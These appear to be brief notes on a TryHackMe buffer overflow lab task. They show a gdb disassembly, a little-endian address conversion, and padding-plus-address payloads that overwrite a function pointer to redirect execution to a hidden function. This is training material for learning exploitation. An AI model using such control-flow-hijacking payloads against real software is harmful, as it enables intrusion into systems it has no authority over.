THM - Buffer Overflow - T7
Check special function address
(gdb) disassemble special
--> Dump of assembler code for function special:
!!> 0x0000000000400567 <+0>: push %rbp <!!---------
--> 0x0000000000400568 <+1>: mov %rsp,%rbp
--> 0x000000000040056b <+4>: mov $0x400680,%edi
--> 0x0000000000400570 <+9>: callq 0x400460 <puts@plt>
--> 0x0000000000400575 <+14>: mov $0x40069d,%edi
--> 0x000000000040057a <+19>: callq 0x400460 <puts@plt>
--> 0x000000000040057f <+24>: nop
--> 0x0000000000400580 <+25>: pop %rbp
--> 0x0000000000400581 <+26>: retq
--> End of assembler dump.
little endian
\x00\x00\x00\x40\x05\x67 --> \x67\x05\x40\x00\x00\x00
Control over EIP
gdb func-pointer
run
AAAAAAAAAAAAAAAAAAAA
-- > 0x0000414141414141
Example payload
Payload | Response |
AAAAAAAAAAAAAA | 0x00007fffffffeb27 |
AAAAAAAAAAAAAAAA | 0x0000000000004141 |
AAAAAAAAAAAAAAAAA | 0x0000000000414141 |
AAAAAAAAAAAAAAAAAA | 0x0000000041414141 |
AAAAAAAAAAAAAAAAAAAA | 0x0000414141414141 |
AAAAAAAAAAAAAA\x67\x05\x40\x00\x00\x00 > | you did this, friend! |